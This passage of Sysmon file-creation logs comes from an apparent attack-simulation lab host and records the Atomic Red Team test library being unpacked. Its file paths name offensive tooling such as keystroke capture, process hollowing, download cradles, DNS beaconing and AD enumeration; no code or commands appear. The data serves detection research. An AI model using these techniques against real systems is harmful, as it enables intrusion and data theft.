05:52:33.437","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4717,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:33.437\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.004\\src\\x64\\T1055.dll\r\nCreationUtcTime: 2020-08-01 05:52:33.437","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:33.437","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.004\\src\\x64\\T1055.dll","CreationUtcTime":"2020-08-01 05:52:33.437","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4718,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.452\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.012\\src\\Start-Hollow.ps1\r\nCreationUtcTime: 2020-08-01 05:52:33.452","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.452","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.012\\src\\Start-Hollow.ps1","CreationUtcTime":"2020-08-01 05:52:33.452","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4719,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:33.468\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055\\src\\Win32\\T1055.dll\r\nCreationUtcTime: 2020-08-01 05:52:33.468","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:33.468","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055\\src\\Win32\\T1055.dll","CreationUtcTime":"2020-08-01 05:52:33.468","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4720,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:33.468\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055\\src\\x64\\T1055.dll\r\nCreationUtcTime: 2020-08-01 05:52:33.468","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:33.468","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055\\src\\x64\\T1055.dll","CreationUtcTime":"2020-08-01 05:52:33.468","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4721,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.484\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.001\\src\\Get-Keystrokes.ps1\r\nCreationUtcTime: 2020-08-01 05:52:33.484","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.484","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.001\\src\\Get-Keystrokes.ps1","CreationUtcTime":"2020-08-01 05:52:33.484","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4722,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:33.484\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\bin\\T1056.004x64.dll\r\nCreationUtcTime: 2020-08-01 05:52:33.484","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:33.484","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\bin\\T1056.004x64.dll","CreationUtcTime":"2020-08-01 05:52:33.484","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4723,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:33.499\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\bin\\T1056.004x86.dll\r\nCreationUtcTime: 2020-08-01 05:52:33.499","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:33.499","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\bin\\T1056.004x86.dll","CreationUtcTime":"2020-08-01 05:52:33.499","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4724,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.499\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\T1056.004.sln\r\nCreationUtcTime: 2020-08-01 05:52:33.499","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.499","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\T1056.004.sln","CreationUtcTime":"2020-08-01 05:52:33.499","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4725,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.499\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\T1056.004\\T1056.004.vcxproj\r\nCreationUtcTime: 2020-08-01 05:52:33.499","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.499","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\T1056.004\\T1056.004.vcxproj","CreationUtcTime":"2020-08-01 05:52:33.499","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4726,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:33.499\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\Win32\\T1056.004.dll\r\nCreationUtcTime: 2020-08-01 05:52:33.499","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:33.499","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\Win32\\T1056.004.dll","CreationUtcTime":"2020-08-01 05:52:33.499","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4727,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:33.515\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\x64\\T1056.004.dll\r\nCreationUtcTime: 2020-08-01 05:52:33.515","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:33.515","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\x64\\T1056.004.dll","CreationUtcTime":"2020-08-01 05:52:33.515","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4728,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.531\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1059.001\\src\\Invoke-DownloadCradle.ps1\r\nCreationUtcTime: 2020-08-01 05:52:33.531","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.531","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1059.001\\src\\Invoke-DownloadCradle.ps1","CreationUtcTime":"2020-08-01 05:52:33.531","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4729,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.531\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1059.001\\src\\test.ps1\r\nCreationUtcTime: 2020-08-01 05:52:33.531","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.531","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1059.001\\src\\test.ps1","CreationUtcTime":"2020-08-01 05:52:33.531","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4730,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.577\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1071.004\\src\\T1071-dns-beacon.ps1\r\nCreationUtcTime: 2020-08-01 05:52:33.577","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.577","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1071.004\\src\\T1071-dns-beacon.ps1","CreationUtcTime":"2020-08-01 05:52:33.577","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4731,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.577\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1071.004\\src\\T1071-dns-domain-length.ps1\r\nCreationUtcTime: 2020-08-01 05:52:33.577","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.577","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1071.004\\src\\T1071-dns-domain-length.ps1","CreationUtcTime":"2020-08-01 05:52:33.577","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4732,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.593\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1074.001\\src\\Discovery.bat\r\nCreationUtcTime: 2020-08-01 05:52:33.593","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.593","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1074.001\\src\\Discovery.bat","CreationUtcTime":"2020-08-01 05:52:33.593","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4733,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 05:52:33.609\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1087.002\\src\\AdFind.exe\r\nCreationUtcTime: 2020-08-01 05:52:33.609","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 05:52:33.609","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1087.002\\src\\AdFind.exe","CreationUtcTime":"2020-08-01 05:52:33.609","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4734,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.671\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1110.003\\src\\parse_net_users.bat\r\nCreationUtcTime: 2020-08-01 05:52:33.671","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.671","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1110.003\\src\\parse_net_users.bat","CreationUtcTime":"2020-08-01 05:52:33.671","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4735,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.687\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1114.001\\src\\Get-Inbox.ps1\r\nCreationUtcTime: 2020-08-01 05:52:33.687","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 